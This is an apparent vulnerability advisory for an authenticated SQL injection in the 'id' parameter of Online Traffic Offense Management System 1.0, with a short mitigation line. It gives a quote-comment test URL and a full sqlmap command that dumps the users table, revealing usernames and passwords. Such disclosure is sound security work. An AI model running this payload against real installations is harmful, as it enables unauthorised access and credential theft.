vendor:
Online Traffic Offense Management System
by:
Justin White
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Online Traffic Offense Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:online_traffic_offense_management_system:1.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Linux (Ubuntu 20.04)
2021
Online Traffic Offense Management System 1.0 – ‘id’ SQL Injection (Authenticated)
The id paramater is vulnerable to SQL injection. Going to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page. Using sqlmap with dump database, sqlmap -u "http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4" --cookie="PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac" -D traffic_offense_db -T users --dump, will reveal the username and password of the users.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in a SQL query.